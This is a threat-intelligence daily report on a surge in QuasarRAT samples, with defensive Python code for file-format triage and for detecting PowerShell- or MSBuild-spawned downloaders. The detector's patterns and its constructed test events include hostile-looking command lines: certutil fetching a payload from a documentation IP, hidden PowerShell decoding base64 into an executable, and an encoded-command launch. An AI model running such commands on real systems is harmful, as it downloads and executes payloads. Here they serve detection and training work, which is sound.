QuasarRAT - Daily Threat Report

Tuesday, April 21, 2026

Daily Summary

Today’s detection of 11 new QuasarRAT samples is a sharp surge: the 7-day average is roughly 2 samples per day, and today’s count exceeds it by 381% (the percentage is computed against the unrounded average). The increase is confined to sample volume; no new command-and-control infrastructure was registered alongside the new samples.

New Samples Detected

The new samples show a diverse file type profile. .exe files are the majority (6 of 11), but the batch also includes .zip archives, a PowerShell script (.ps1), a .bin file and a file with an unusual .88 extension, which suggests varied initial access vectors. The .bin and .88 files may be raw or obfuscated payloads, or the output of non-standard packers. Note that the extension recorded in a sample repository is only the name the submitter gave the file; confirm the actual format from the file’s leading bytes before drawing conclusions about packing or obfuscation.
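The following is an added example, not code from the report or from its data sources: it identifies a sample’s real container format from its magic bytes and flags files whose extension disagrees with their content, which is the check a triager runs on the .bin and .88 samples before believing a packer theory. The sample bytes (`SAMPLES`) are constructed stand-ins, not real QuasarRAT files.

```python
"""Identify a sample's real container format from its leading bytes instead
of trusting the submitted file extension.

Added example, not code from the report or from its data sources. The
sample bytes below are constructed stand-ins, not real QuasarRAT files."""

# (magic bytes, label) for the container formats seen in the batch.
MAGIC = [
    (b"MZ", "pe"),           # DOS stub that precedes every PE (.exe/.dll)
    (b"PK\x03\x04", "zip"),  # ZIP local file header (.zip, also OOXML docs)
    (b"\x7fELF", "elf"),
]

# Formats an extension is supposed to carry; anything else is an oddity.
EXPECTED = {"exe": "pe", "dll": "pe", "zip": "zip", "ps1": "powershell-text"}
CONTAINERS = {"pe", "zip", "elf"}


def identify(data: bytes) -> str:
    """Return a format label for the first bytes of a file."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    # PowerShell has no magic number: fall back to a text heuristic.
    try:
        text = data[:512].decode("utf-8-sig").lower()
    except UnicodeDecodeError:
        return "unknown-binary"
    if any(tok in text for tok in ("$", "invoke-", "iex", "frombase64string", "new-object")):
        return "powershell-text"
    return "unknown-text"


def has_pe_header(data: bytes) -> bool:
    """Confirm a real PE: e_lfanew at 0x3C must point at the 'PE\\0\\0' signature."""
    if not data.startswith(b"MZ") or len(data) < 0x40:
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(name: str, data: bytes) -> dict:
    """Compare the claimed extension with the detected format and flag mismatches."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    fmt = identify(data)
    if fmt == "pe" and not has_pe_header(data):
        fmt = "mz-no-pe"  # MZ stub but no PE header: truncated or deliberately mangled
    expected = EXPECTED.get(ext)
    # Flag when a known extension lies, or an odd extension hides a real container.
    flag = (fmt != expected) if expected else (fmt in CONTAINERS)
    return {"name": name, "ext": ext, "format": fmt, "flag": flag}


def _fake_pe() -> bytes:
    """Minimal bytes that satisfy has_pe_header (constructed, not a real binary)."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


# Constructed stand-ins for the file types in today's batch.
SAMPLES = {
    "loader.exe": _fake_pe(),
    "invoice.zip": b"PK\x03\x04" + b"\x00" * 26,
    "stage.ps1": b"$p=[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes('a.bin',$p)",
    "payload.88": _fake_pe(),             # a PE hiding behind an odd extension
    "blob.bin": b"\x8f\x11\xfe\xa0" * 8,  # not valid UTF-8, no known magic
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(triage(name, data))
```

In this constructed set, `payload.88` is flagged because an odd extension hides a full PE, while `blob.bin` is not flagged: it is simply opaque bytes, which is the case where a packer or encrypted stage remains a possibility and warrants deeper analysis rather than an assumption.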

Distribution Methods

The mix of file types points to multiple delivery mechanisms. The .zip files most likely wrap the .exe payloads for distribution as phishing attachments or malicious downloads. The single .ps1 sample points to direct script-based execution, for example launched from a macro-enabled document or through living-off-the-land techniques, while the odd extensions could belong to targeted, low-volume campaigns.

Detection Rate

Vendor detection for these new samples is moderate: roughly 55-65% of engines flag them as malicious. The .ps1 and .88 samples show slightly lower initial detection, which suggests these variants were lightly modified to evade signature-based detection in the period immediately after release. Detection rates usually climb as vendors process fresh submissions, so a low initial score should not be read as a clean verdict.

C2 Infrastructure

No new C2 servers were identified today. The actors are therefore likely either reusing existing, resilient infrastructure or in a preparatory phase, seeding loaders that will connect to established servers. An absence of new C2 entries in the data sources reflects what has been reported, not what the samples contain; extracting the configured hosts from the samples themselves would settle the question. Geographic targeting data for this batch remains unavailable.

7-Day Trend

Activity was minimal and steady before today, which makes this spike an outlier. It points to a concentrated push of new variants or the launch of a discrete campaign rather than sustained, high-volume distribution.

Security Analysis

The surge in samples without corresponding new C2 infrastructure is notable: actors may be stress-testing new obfuscation techniques or preparing a campaign that will use pre-established, trusted servers. The .ps1 file fits the trend of using native scripting for lightweight deployment. A key defensive recommendation is to monitor for child processes spawned by powershell.exe or msbuild.exe that attempt to download or decode binary payloads, a common pattern for script-based QuasarRAT deployment. Sysmon Event ID 1 (process creation), or Windows Security event 4688 with command-line auditing enabled, supplies the parent image, child image and command line needed for that check.
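As an added example of the monitoring recommended above (this is not code from the report or from any vendor), the following rule runs over process-creation events and flags a child of powershell.exe, pwsh.exe or msbuild.exe whose command line downloads content or decodes an embedded payload. The events in `EVENTS` are constructed records shaped like Sysmon Event ID 1, carrying only the fields the rule uses; the 198.51.100.7 address is from the RFC 5737 documentation range and the base64 fragment is a placeholder.

```python
"""Flag process-creation events in which powershell.exe or msbuild.exe spawns
a child that downloads or decodes a binary payload.

Added example, not code from the report. The events are constructed records
shaped like Sysmon Event ID 1 (only the fields used here), not real telemetry;
198.51.100.7 is an RFC 5737 documentation address."""

import re

# Script hosts whose children are worth scrutinising.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "msbuild.exe"}

# Command-line fragments that fetch a payload from the network...
DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|bitsadmin|start-bitstransfer|certutil.*-urlcache",
    re.I,
)
# ...or turn an encoded blob back into bytes. "-enc" is matched only as a
# whole switch, so "-Encoding utf8" does not trip the rule.
DECODE = re.compile(
    r"frombase64string|certutil.*-decode|-enc(odedcommand)?\b|writeallbytes",
    re.I,
)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either separator style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> list:
    """Return the reasons an event is suspicious (empty list when it is not)."""
    parent = basename(ev.get("ParentImage", ""))
    if parent not in SCRIPT_HOSTS:
        return []
    child = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []
    if DOWNLOAD.search(cmd):
        reasons.append(f"{parent} -> {child}: downloads content")
    if DECODE.search(cmd):
        reasons.append(f"{parent} -> {child}: decodes an embedded payload")
    return reasons


def find_suspicious(events: list) -> list:
    """(UtcTime, reasons) for every event that trips at least one rule."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["UtcTime"], reasons))
    return hits


# Constructed Sysmon-style events: three suspicious, three benign.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"UtcTime": "2026-04-21 09:12:03", "ParentImage": PS,
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://198.51.100.7/q.bin C:\Users\Public\q.bin"},
    {"UtcTime": "2026-04-21 09:12:04",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "Image": PS,
     "CommandLine": "powershell -nop -w hidden -c \"[IO.File]::WriteAllBytes('C:\\Users\\Public\\a.exe',[Convert]::FromBase64String($b))\""},
    {"UtcTime": "2026-04-21 09:12:05", "ParentImage": PS, "Image": PS,
     "CommandLine": "powershell -NoP -NonI -W Hidden -Enc JAB..."},
    {"UtcTime": "2026-04-21 09:13:00", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Get-ChildItem C:\\Temp"},
    {"UtcTime": "2026-04-21 09:13:01", "ParentImage": PS,
     "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"UtcTime": "2026-04-21 09:13:02", "ParentImage": PS, "Image": PS,
     "CommandLine": "powershell Out-File -Encoding utf8 C:\\Temp\\report.txt"},
]

if __name__ == "__main__":
    for when, reasons in find_suspicious(EVENTS):
        print(when, "; ".join(reasons))
```

The rule is deliberately keyed on the parent process rather than on QuasarRAT itself: it catches the loader behaviour the report describes regardless of which final payload the script drops, and the benign events (an interactive PowerShell session, conhost.exe, an `-Encoding` switch) show where false positives have to be ruled out before the rule goes into an alerting pipeline.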

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
